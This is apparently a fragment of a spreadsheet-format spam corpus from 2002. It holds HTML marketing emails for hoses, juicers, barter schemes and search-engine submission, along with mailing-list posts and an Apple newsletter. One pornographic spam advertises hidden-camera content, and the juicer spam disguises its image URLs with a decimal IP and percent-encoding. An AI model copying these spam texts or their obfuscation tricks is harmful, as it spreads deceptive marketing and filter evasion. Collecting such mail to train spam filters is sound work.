     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_09.gif" ALT="" WIDTH=38 HEIGHT=54 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;table width="550" border="0" align="center" cellspacing="0"&gt;
   &lt;tr&gt; 
     &lt;td class="BODYCOPY"&gt;&lt;div align="center"&gt; 
         &lt;p align="left"&gt;&lt;br&gt;
           &lt;span class="BOLD"&gt;Never be tangled up in yard work again! &lt;/span&gt;Break 
           free with the amazing Flat Hose. It is &amp;quot;Firehose Technology&amp;quot; 
           for flat, tangle-free, space-saving storage. This amazing flat coiling 
           garden hose is guaranteed to take the mess out of watering. And it 
           attaches easily to any faucet -- where your old hose used to lay in a 
           muddy pile.&lt;/p&gt;
       &lt;/div&gt;
       &lt;ul&gt;
         &lt;li&gt; 
           &lt;div align="left"&gt;Watering your plants or washing the car has never 
             been easier.&lt;/div&gt;
         &lt;/li&gt;
         &lt;li&gt; 
           &lt;div align="left"&gt; The compact Flat Hose is made of a tough yet flexible 
             material so it will last. &lt;/div&gt;
         &lt;/li&gt;
         &lt;li&gt;Flat Hose winds up easily, without twisting for trouble free storage 
           anywhere.&lt;/li&gt;
         &lt;li&gt; 
           &lt;div align="left"&gt;Rubber hoses can weigh up to fifteen pounds, but the 
             Flat Hose is so lightweight that you can easily move it for any job, 
             anywhere. &lt;/div&gt;
         &lt;/li&gt;
       &lt;/ul&gt;
       &lt;div align="center"&gt;
         &lt;p align="center"&gt; &lt;span class="BOLDRed"&gt;If you order in the next 72 hours, 
           &lt;/span&gt;&lt;br&gt;
           your FLATHOSE comes with these Great Accessories &amp;amp; Options:&lt;br&gt;
           (A $20.00 Value)&lt;/p&gt;
         &lt;p align="left"&gt;&amp;#8226; Convenient Storage Reel&lt;br&gt;
           &amp;#8226; An Additional 25 Feet: For a limited time, get a 50 foot Flat 
           Hose for just $15 more!&lt;br&gt;
           &amp;#8226; Spray Gun: Includes a special chamber for adding soap or fertilizer!&lt;/p&gt;
         &lt;p align="center" class="BOLD"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;ORDER 
           NOW&lt;/a&gt; &lt;/p&gt;
       &lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- End ImageReady Slices --&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;table width="500" height="18" align="center" cellpadding="0" cellspacing="0"&gt;
   &lt;tr&gt; 
     &lt;td width="548" height="18"&gt; &lt;div align="center"&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" class="body"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Eq0Am"&gt;&lt;img src="http://images.consumertoday.net/images/email/flathose_1_asotv_tiny.gif" width="40" height="29" border="0" align="left"&gt;&lt;span class="ASOTVLINK"&gt;&lt;img src="http://images.consumertoday.net/images/email/flathose_1_asotv_tiny.gif" width="40" height="29" border="0" align="right"&gt; 
         Click here to see HUNDREDS of As Seen On TV products&lt;br&gt;
         ---Direct from the Manufacturers.&lt;/span&gt;&lt;/a&gt;&lt;/font&gt; &lt;/div&gt;
        &lt;div align="center"&gt;&lt;font size="1" face="Verdana, Arial, Helvetica, sans-serif" class="body"&gt; 
         &lt;/font&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;CENTER&gt;&lt;table border="1" cellpadding="3" cellspacing="0" width="550" bordercolor="#000000" body bgcolor="white"&gt;
 &lt;tr&gt;&lt;td width="551" height="5" align="center" valign="middle"&gt;&lt;table width="550" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;FONT FACE="Verdana, Modern, Arial" SIZE="2" color="gray"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages. This message has been sent to gibbs@midrange.com because you are a member of Consumer Today or you signed up with one of our marketing partners. To unsubscribe, simply click &lt;a href="http://unsub.ct.consumertoday.net/consumer_today/ct_site_unsub.html"&gt;&lt;font color="blue"&gt;&lt;u&gt;here&lt;/u&gt;&lt;/font&gt;&lt;/a&gt; (please allow 3-5 business days for your unsubscribe request to be processed). Questions or comments - send them to &lt;a href="mailto:customerservice@consumertoday.net"&gt;&lt;font color="blue"&gt;&lt;u&gt;customerservice@consumertoday.net&lt;/u&gt;&lt;/font&gt;&lt;/a&gt;.&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/center&gt;&lt;/body&gt;
 &lt;IMG SRC="http://ct2.consumertoday.net/cgi-bin14/flosensing?y=FW0CCzME0D40Bx"&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">At 09:24 PM 8/3/02 -0700, Mr. FoRK wrote:
 &gt;Don't know if everybody knows this trick...
 &gt;
 &gt;Puts 127.0.0.1 as the IP for adservers. Elegant.
 You should note that this trick has been out-evolved by [some] websites. 
 These sites (e.g, yahoo) require a cookie that is set by the pop-up ad to 
 be present before your browsing can continue...
 Udhay
 -- 
 ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
       God is silent. Now if we can only get Man to shut up.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: wives and girlfriends cheating and whoring around 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;table width="600" border="20" align="center" bordercolor="#FFCCFF" bgcolor="#FFCCFF"&gt;
 &lt;tr&gt;
 &lt;td align="center"&gt;
 &lt;font face="verdana"&gt;
 &lt;a href="http://free4pornlovers.com/simply-amateur/"&gt;&lt;font size="+3" color="#990000"&gt;Click Here Now !&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="+4" color="#660066"&gt;Simply Amateur&lt;/font&gt;&lt;br&gt;
 &lt;font size="+2" color="#9933FF"&gt;Just like the girl next door.&lt;/font&gt;&lt;br&gt;
 &lt;a href="http://free4pornlovers.com/simply-amateur/"&gt;&lt;font size="+3" color="#990000"&gt;XXX Free Tour !&lt;/font&gt;&lt;br&gt;
 &lt;font size="+2" color="#FF0099"&gt;First time photos !&lt;br&gt;Sneeky hidden cams !&lt;br&gt;Nude exibitionists !&lt;br&gt;Cheating Wives and Girlfriends !&lt;/font&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;tr&gt;
 	&lt;td align="center"&gt;&lt;a href="http://free4pornlovers.com/cgi-bin/list-remove.pl"&gt;Click here to be removed&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Wednesday, August 28, 2002, at 11:48  AM, Robin Lynn Frank wrote:
 &gt; If I were a spammer, I'd simply set up a server, send out my 
 &gt; spam with the
 &gt; Habeus headers and continue till I was reasonably certain I'd 
 &gt; been reported.
 &gt; Then I'd simply reconfigure the server and reconnect to a 
 &gt; different IP.  As
 &gt; long as no one can establish my connection to the web sites my spam is
 &gt; directing people to, I'm home free.
 Uh... the reason is simple. Habeas runs something called the 
 "Habeas Infringers List", and if you use their trademark without 
 their permission, you'll end up on it.  Then, when you send spam 
 with the misappropriated header, users of SA (2.40 supports 
 this) will tag your mail as spam, rather than let it through. 
 This may be done independantly of your IP address, so be 
 prepared to constantly change domain names, and move your 
 servers as fast as you send spam.
 Also, that little haiku is a copyrighted work, so not only CAN 
 Habeas sue, they MUST sue to protect their copyright. And since 
 it's a trademark as well, that's a double-whammy. Habeas has 
 some pretty high-powered legal people, who will gladly go to 
 town on violators.
 The whole point here is to give them the legal leverage they 
 need to put spammers out of business, and not only block mail 
 from them, but allow through the things that really AREN'T spam.
 --B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</si>
  <si>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[use Perl] Headlines for 2002-07-31
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Mac OS X Conference Registration Opens
     posted by ziggy on Monday July 29, @22:58 (events)
     http://use.perl.org/article.pl?sid=02/07/30/0317236
 New Pumpking is Crowned
     posted by pudge on Tuesday July 30, @16:15 (releases)
     http://use.perl.org/article.pl?sid=02/07/30/2016230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</si>
  <si>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[SA] Chuong trinh khuyen mai he 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I have visited TAINT.ORG and noticed that ...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#D9E4EA" text="#000000"&gt;
 &lt;BASE HREF="http://image99.seekercenter.net/"&gt;
 &lt;table width="500" border="0" cellspacing="0" cellpadding="0"&gt;
   &lt;tr&gt; 
     &lt;td bgcolor="#FFFFFF"&gt;&amp;nbsp; &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td bgcolor="#FFFFFF" align="center"&gt; 
       &lt;table width="446" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt;
           &lt;td&gt;
             &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr&gt; 
                 &lt;td width="96"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_01.gif" width="96" height="41" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width="241"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_02.gif" width="241" height="41" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width="109"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_03.gif" width="109" height="41" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="96"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_04.gif" width="96" height="160" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width="241"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="http://image99.seekercenter.net/temp/1/41/sna236.jpg" width="241" height="160" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width="109"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_05.gif" width="109" height="160" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="96"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_06.gif" height="6" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width="241"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_07.gif" height="6" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td width="109"&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_08.gif" width="109" height="6" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;a href="http://www.seekercenter.com" target="_blank"&gt;&lt;img src="image/em_09.gif" width="446" height="89" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor="#FFFFFF"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td bgcolor="#FFFFFF"&gt;
       &lt;table width="517" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td&gt; 
             &lt;table width="480" border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr&gt; 
                 &lt;td width="50"&gt; 
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif"&gt;&lt;br&gt;
                     &lt;/font&gt; &lt;/p&gt;
                 &lt;/td&gt;
                 &lt;td&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;Hi 
                   Jm, &lt;/font&gt; 
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;Thanks 
                     for visiting &lt;a href="http://www.seekercenter.net" target="_blank"&gt;http://www.seekercenter.net&lt;/a&gt;. 
                     &lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;Over 
                     90% web surfers use search engines to locate their needed 
                     info nowadays, so your web site is only effective when people 
                     can find it. If you are not listed on search engines - you 
                     lose. Nobody shows up no matter how attractive you made your 
                     site. As well, the investment you made in building it will 
                     not yield any dividends at all!&lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;As 
                     a popular site promotion tool, SeekerCenter uniquely submits 
                     your website to 500,000+ search engines and directories worldwide, 
                     attracting great traffic to your business website. &lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;If 
                     you wish someone could step you through SeekerCenter WebPromoter 
                     program, you can check at &lt;a href="http://www.seekercenter.net/faq.php" target="_blank"&gt;http://www.seekercenter.net/faq.php&lt;/a&gt;. 
                     &lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;If 
                     you'd like to view to which search engines &amp;amp; directories 
                     we submit your web site, please check &lt;a href="http://www.seekercenter.net/engines.php" target="_blank"&gt;http://www.seekercenter.net/engines.php&lt;/a&gt;. 
                     &lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;Questions 
                     or comments? Contact &lt;a href="mailto:vanessa@seekercenter.net"&gt;Vanessa@seekercenter.net&lt;/a&gt; 
                     for more information.&lt;/font&gt;&lt;/p&gt;
                   &lt;p&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" size="2" color="#000033"&gt;Sincerely,&lt;br&gt;
                     Vanessa Linter&lt;br&gt;
                     Customer Service&lt;br&gt;
                     &lt;a href="http://www.seekercenter.net" target="_blank"&gt;http://www.seekercenter.net 
                     &lt;/a&gt;&lt;/font&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" color="#000033"&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Juiceman II                 19819
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content=3D"text/html; charset=3Diso-8859-1" http-equiv=3DContent-Typ=
 e&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;CENTER&gt;
 &lt;TABLE border=3D2 borderColor=3Dgreen cellPadding=3D0 cellSpacing=3D0 widt=
 h=3D500&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle vAlign=3Dtop&gt;
       &lt;TABLE border=3D0 cellPadding=3D5 width=3D500&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle colSpan=3D2 vAlign=3Dtop&gt;&lt;img border=3D"0" sr=
 c=3D"http://3286983112/%70%65%72%73%6Fnal%39/%35%30%301%30%33/ju%69c%65ma%=
 6E%2D%68%65a%64e%72.%67%69%66"&gt; &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3D2&gt;&lt;FONT color=3Dred 
             face=3DVerdana,Geneva,Arial,Helvetica,sans-serif size=3D2&gt;
             &lt;CENTER&gt;&lt;B&gt;
             &lt;H3&gt;&lt;i&gt;Juice... for Your Health!&lt;/i&gt; &lt;/H3&gt;&lt;/B&gt;&lt;/CENTER&gt;&lt;/FONT&gt;=
 &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3D2&gt;&lt;FONT face=3DVerdana,Geneva,Arial,Helvetica,sans=
 -serif 
             size=3D2&gt;&lt;IMG align=3Dright alt=3D"" border=3D0 
             src=3D"http://3286983112/%70%65r%73%6F%6Eal9/%35%30%301%30%33/=
 %6A%75i%63%65%6D%61%6E%32.%6A%70%67"&gt;&lt;font face=3D"Arial, Helvetica, sans-=
 serif, Verdana" size=3D"2"&gt;Turn your favorite fruits and vegetables into g=
 ood-for-you juice! Juiceman II is the quick and easy juicer to help meet y=
 our nutritional needs. A few of the benefits of juicing are increased ener=
 gy, a glowing complexion, strengthened immune system, stronger bones and a=
  reduced risk of disease. &amp;nbsp;&lt;/font&gt; &lt;BR&gt;&lt;BR&gt;&lt;font face=3D"Arial, Helve=
 tica, sans-serif, Verdana" size=3D"2"&gt;Why pay for bottled juice that may h=
 ave lost its valuable nutrients when you can enjoy healthier, fresh squeez=
 ed, homemade juice with fruits and vegetables growing in your garden or fr=
 om the farmer's market? &lt;/font&gt;&lt;/FONT&gt;&lt;font face=3D"Arial, Helvetica, sans=
 -serif, Verdana" size=3D"2"&gt;.&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=3Dtop&gt;&lt;FONT color=3Dred 
             face=3DVerdana,Geneva,Arial,Helvetica,sans-serif size=3D2&gt;&lt;B&gt;P=
 roduct Includes:&lt;/B&gt; &lt;/FONT&gt;&lt;FONT 
             face=3DVerdana,Geneva,Arial,Helvetica,sans-serif size=3D2&gt;
             &lt;ul&gt;
             &lt;LI&gt;6-Tape Audio Cassette Series
             &lt;LI&gt;Recipe &amp; Menu Planner
             &lt;LI&gt;Instruction Manual and Salton-Maxim Coupon Booklet
             &lt;LI&gt;&lt;B&gt;BONUS: "Juiceman's Power of Juicing" Book by Jay Kordic=
 h, Anti-Aging Juice Diet Plan, Immune Strengthening Juice Diet Plan and We=
 ight Loss Juice Diet Plan. &lt;/B&gt; &lt;BR&gt;
 			&lt;LI&gt;&lt;font color=3D"#FF0000"&gt;&lt;b&gt;30-day Money Back Guarantee&lt;/b&gt;&lt;/font&gt;&lt;B=
 R&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/LI&gt;
             &lt;/ul&gt;
             &lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle colSpan=3D2&gt;
             &lt;p align=3D"center"&gt;&lt;A 
             href=3D"http://www.myratedoctor.com/tvdeals/index2.html"&gt;&lt;IMG 
             border=3D0 
             src=3D"http://3286983112/p%65%72%73%6Fn%61%6C%39/%350%30%31%30=
 %33/%6A%75%69%63%65ma%6E_%62ut%74%6Fn%2E%67%69%66"&gt;&lt;/A&gt; 
             &lt;/p&gt;
           &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;CENTER&gt;&lt;FONT size=3D-1&gt;&lt;a href=3D"mailto:tvdeals1@excite.com?subject=3Dre=
 move"&gt;Click 
 here&lt;/a&gt; to unsubscribe from these mailings. &lt;/FONT&gt;&lt;/CENTER&gt;&lt;BR&gt;
 &lt;table&gt;
   &lt;TR&gt;&lt;TD&gt;&lt;FONT 
 color=3Dblack size=3D2&gt;Your privacy is extremely important to us. You requ=
 ested to 
 receive this mailing by registering at TV Deals or by subscribing through =
 one 
 of our marketing partners. As a leader in permission-based email marketing=
 , we 
 are committed to delivering a highly rewarding experience that includes mo=
 ney 
 saving offers from your favorite brands, on-line bargains, and entertainme=
 nt. 
 However, if you wish to unsubscribe, please click the link above. 
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/BODY&gt;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</si>
  <si>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[ILUG-Social] We want to trade with you
</t>
  </si>
  <si>
    <t xml:space="preserve">Why Spend Your Hard Earned Cash?
 Barter YOUR business product or service, personal item, collectible, excess inventory, hotel rooms, etc. for items and services YOU NEED.......SAVE YOUR CASH!!!!!
 Vacations, cell phones, collectibles, travel, sports tickets, Radio, Television and Newspaper Advertising, concert tickets, Printing Services, Graphic Design, Bulk Mail Services, Restaurants, Meeting Facilities, Business Maintenance, Attorney and Accounting Services, Marketing, Consultants, Web Site Design, Travel, Medical Services, Hotel Furniture and much, much more!
 We are a global marketplace, where you can list your products or services on the website and earn trade dollars when they sell. Use these dollars to purchase what you need. You are not trading "one on one", so ANYTHING in the system is available for you to purchase!! There is a very small cash commission on each transaction (3%), but there is no membership fee......its FREE.......there are no monthly fees, no listing fees, no renewal fees.
 WE GIVE YOU A $1500 CREDIT LINE to start immediately!!!
 If you do not see all of the items you are looking for TODAY, be assured that as we enter the hundreds of thousands of individuals and businesses that are in our database you WILL find the things you want and need--come back often
 Begin to barter today and SAVE CASH.......it will be the best thing you ever did!
 SIMPLY REPLY WITH THE WORDS "MORE INFORMATION" IN THE SUBJECT LINE, AND START TRADING TODAY OR WITH THE WORD "DISCONTINUE" TO RECEIVE NO FURTHER NOTICES.
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apple Store eNews : November 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--EG3OZ08L.0DOB2JAQ-euro.apple.com
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: quoted-printable
 You appear to be using an email application that won't properly display
 the graphical (or HTML) version of our newsletter. Because we want you
 to enjoy reading Apple Store eNews, we recommend that you visit the
 following  web page where it has been posted :
 http://registration.euro.apple.com/asnews/november2002/ie/
 --EG3OZ08L.0DOB2JAQ-euro.apple.com
 Content-type: text/html
 Content-disposition: inline
 Content-transfer-encoding: 7BIT
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Apple Store eNews ::: November 2002 &lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;link rel="stylesheet" href="http://registration.euro.apple.com/asnews/subscribe/style.css" type="text/css"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 a:link {  font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px; color: #0066FF}
 a:hover {  font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px; color: #CC0000}
 a:visited {  font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px; color: #767575}
 A.TOPAPPS                  {text-decoration: none; color:#000000; font-size: 9px; font-family: Geneva, Arial, Helvetica, sans-serif }
 A:hover.TOPAPPS	   		{text-decoration: none; color:#0066FF; font-size: 9px; font-family: Geneva, Arial, Helvetica, sans-serif }
 .searchbox {  font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px}
 --&gt;
 &lt;/style&gt;
 &lt;BODY BGCOLOR="#ffffff" LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;&lt;!--startmsg--&gt;&lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
 	&lt;tr&gt;
 		&lt;td align="center"&gt;&lt;font size="1" face="Geneva, Arial, Helvetica, sans-serif"&gt;If this message does not display correctly, &lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Femail.euro.apple.com%2Fstore%2Fasnews%2Fnovember2002%2Fie%2F&amp;P=ie_display"&gt;Click here&lt;/A&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;tr&gt;
 &lt;/table&gt;&lt;!--endmsg--&gt;
 &lt;br&gt;
 &lt;table width="598" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;!--Start Shell Guide --&gt;
   &lt;tr&gt; 
 	&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 	&lt;td width="596" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
 	&lt;td width="1" height="1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;!--End Shell Guide --&gt;
   &lt;!--Start Banner Span--&gt;
   &lt;tr&gt; 
 	&lt;td colspan="3" width="598" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/bg_bug.gif"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/store_cap.jpg" width="598" height="92" border="0" usemap="#top_cap_map" alt="Apple Store eNews"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;!--End Banner Span--&gt;
   &lt;!--Start Meat &amp; Potatoes--&gt;
   &lt;tr&gt; 
 	&lt;td width="1" background="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" NOWRAP&gt;&lt;IMG SRC="http://email.euro.apple.com/store/asnews/november2002/ie/images/grey_dot.gif" HEIGHT="1" WIDTH="1"&gt;&lt;/td&gt;
 	&lt;td&gt; &lt;a name="story1"&gt;&lt;/a&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="596" height="10"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="0" height="0"&gt; 
 	  &lt;table width="596" border="0" cellspacing="0" cellpadding="0"&gt;
 		&lt;tr&gt;
 		  &lt;td width="13"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="13" height="1"&gt;&lt;/td&gt;
 		  &lt;td width="420" valign="top"&gt; 
 			&lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt;
 				&lt;td&gt;&lt;a href="#top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/title1.gif" width="420" height="32" border="0" alt="The SuperDrive to go"&gt;&lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt;
 				&lt;td&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3Ffamily%3DPowerBook&amp;P=ie_gStory1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/illustr1.jpg" align="left" alt="illustr1" border="0"&gt;&lt;/A&gt;&lt;font size="1" face="Arial, Geneva, Helvetica, sans-serif"&gt;The top-of-the-line Titanium PowerBook G4 now comes with a 1GHz 
 G4 processor and a DVD-burning SuperDrive. To glimpse its power, 
 just imagine a movie studio with all you need to 
 go from raw footage to completely finished DVDs. Now shrink 
 that studio down into a one-inch thin, ultra light package 
 with excellent battery life and a terrific mega-wide 15.2-inch (diagonal) 
 screen driven by a Mobility Radeon 9000 graphics card with 
 64MB of DDR SDRAM&amp;#151;all for just 3.992 Euro inc VAT. The bottom line? 
 The portable of choice for truly demanding users just became 
 an even better choice. &lt;br&gt;
 				  &lt;/font&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		    &lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/spacer.gif" width="310" height="1"&gt;&lt;/td&gt;
 				&lt;td width="110" align="right"&gt;&lt;A HREF="http://www.komtools.net/tracker_court/routage.fdml?F=asenews-november&amp;D=http%3A%2F%2Fstore.apple.com%2FApple%2FWebObjects%2Firlstore%3Ffamily%3DPowerBook&amp;P=ie_gStory1"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/learn_more.gif" width="104" height="28" border="0" alt="Learn More"&gt;&lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
 				&lt;td colspan="2"&gt;&lt;a name="story2"&gt;&lt;/a&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/horizontal_line.gif" width="420" height="13"&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		    &lt;table width="420" border="0" cellspacing="0" cellpadding="0"&gt;
 			  &lt;tr&gt; 
 				&lt;td&gt;&lt;a href="#top"&gt;&lt;img src="http://email.euro.apple.com/store/asnews/november2002/ie/images/title2.gif" width="420" height="32" border="0" alt="The most affordable Mac portable ever"&gt;&lt;/a&gt;&lt;/td&gt;
 			  &lt;/tr&gt;
 			  &lt;tr&gt; 
